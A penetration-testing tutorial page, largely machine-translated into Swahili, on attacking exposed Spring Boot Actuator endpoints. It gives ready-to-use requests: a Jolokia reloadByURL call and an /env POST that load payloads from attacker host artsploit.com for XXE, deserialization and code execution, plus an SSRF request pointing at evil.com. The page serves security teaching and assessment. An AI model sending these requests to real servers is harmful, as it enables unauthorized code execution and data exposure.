# Spring Actuators

{{#include ../../banners/hacktricks-training.md}}

## **Spring Auth Bypass**

<figure><img src="../../images/image (927).png" alt=""><figcaption></figcaption></figure>

**From** [**https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png**](https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png)

## Exploiting Spring Boot Actuators

**Check the original post from** \[**https://www.veracode.com/blog/research/exploiting-spring-boot-actuators**]

### **Key Points:**

- Spring Boot Actuators hujaza mwisho kama `/health`, `/trace`, `/beans`, `/env`, n.k. Katika toleo la 1 hadi 1.4, mwisho haya yanapatikana bila uthibitisho. Kuanzia toleo la 1.5 kuendelea, tu `/health` na `/info` hazina hatari kwa default, lakini waendelezaji mara nyingi huondoa usalama huu.
- Baadhi ya mwisho za Actuator zinaweza kufichua data nyeti au kuruhusu vitendo vya hatari:
- `/dump`, `/trace`, `/logfile`, `/shutdown`, `/mappings`, `/env`, `/actuator/env`, `/restart`, na `/heapdump`.
- Katika Spring Boot 1.x, actuators hujaza chini ya URL ya mzizi, wakati katika 2.x, ziko chini ya njia ya msingi `/actuator/`.

### **Exploitation Techniques:**

1. **Remote Code Execution via '/jolokia'**:
- Mwisho wa actuator `/jolokia` unafichua Maktaba ya Jolokia, ambayo inaruhusu ufikiaji wa HTTP kwa MBeans.
- Kitendo cha `reloadByURL` kinaweza kutumika kuhamasisha mipangilio ya uandishi kutoka URL ya nje, ambayo inaweza kusababisha XXE ya kipofu au Utekelezaji wa Kode ya K remote kupitia mipangilio ya XML iliyoundwa.
- Mfano wa URL ya shambulio: `http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml`.
2. **Config Modification via '/env'**:

- Ikiwa Maktaba za Spring Cloud zipo, mwisho wa `/env` unaruhusu mabadiliko ya mali za mazingira.
- Mali zinaweza kubadilishwa ili kutumia udhaifu, kama vile udhaifu wa deserialization wa XStream katika huduma ya Eureka serviceURL.
- Mfano wa ombi la POST la shambulio:

```
POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream
```

3. **Other Useful Settings**:
- Mali kama `spring.datasource.tomcat.validationQuery`, `spring.datasource.tomcat.url`, na `spring.datasource.tomcat.max-active` zinaweza kubadilishwa kwa shambulio mbalimbali, kama vile SQL injection au kubadilisha nyuzi za muunganisho wa database.

### **Additional Information:**

- Orodha kamili ya actuators za default inaweza kupatikana [here](https://github.com/artsploit/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt).
- Mwisho wa `/env` katika Spring Boot 2.x unatumia muundo wa JSON kwa mabadiliko ya mali, lakini dhana ya jumla inabaki kuwa sawa.

### **Related Topics:**

1.  **Env + H2 RCE**:
- Maelezo kuhusu kutumia mchanganyiko wa mwisho wa `/env` na database ya H2 yanaweza kupatikana [here](https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database).

2.  **SSRF on Spring Boot Through Incorrect Pathname Interpretation**:
- Usimamizi wa mfumo wa Spring wa vigezo vya matrix (`;`) katika majina ya njia za HTTP unaweza kutumika kwa Server-Side Request Forgery (SSRF).
- Mfano wa ombi la shambulio:
```http
GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close
```
{{#include ../../banners/hacktricks-training.md}}